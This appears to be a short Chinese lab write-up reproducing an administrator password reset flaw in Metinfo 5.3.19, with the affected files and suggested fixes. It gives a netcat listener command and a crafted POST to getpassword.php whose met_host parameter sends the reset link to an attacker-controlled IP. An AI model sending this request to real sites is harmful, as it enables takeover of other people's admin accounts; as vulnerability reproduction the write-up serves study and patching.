Metinfo 5.3.19管理員密碼重置漏洞復現

 Metinfo 5.3.19管理員密碼重置漏洞

 

 操做系統：Windows 10專業版   kali linux

 

 網站環境：UPUPW 5.3

 

 使用工具：burpsuite 1.7 beta

 

漏洞分析

#密碼重置過程當中驗證不嚴

#漏洞涉及到的幾個文件分別是：

admin/admin/getpassword.php

include/common.inc.php

include/jmail.php

include/export.func.php

 

 

安裝（請忽略我用QQ瀏覽器）

 

 

 

upupw默認數據帳戶密碼：root--root

漏洞復現

登錄localhost/metinfo/admin點擊忘記密碼

 

用burp抓包

在kali虛擬機上監聽80端口

nc -lvvp 80

kali機器上IP爲192.168.43.15

 

在burp repeater中構造http請求發送

POST /metinfo/admin/admin/getpassword.php?met_host=192.168.43.15

 

這時候在咱們kali監聽的80端口監聽到了密碼重置的連接

 打開連接進入設置密碼界面

 我這裏好幾回沒有監聽到不知到是怎末回事重啓了kali就能夠了（計算機玄學吧有時候得信）

漏洞建議：

升級CMS版本

二次開發中優化登錄代碼避免邏輯錯誤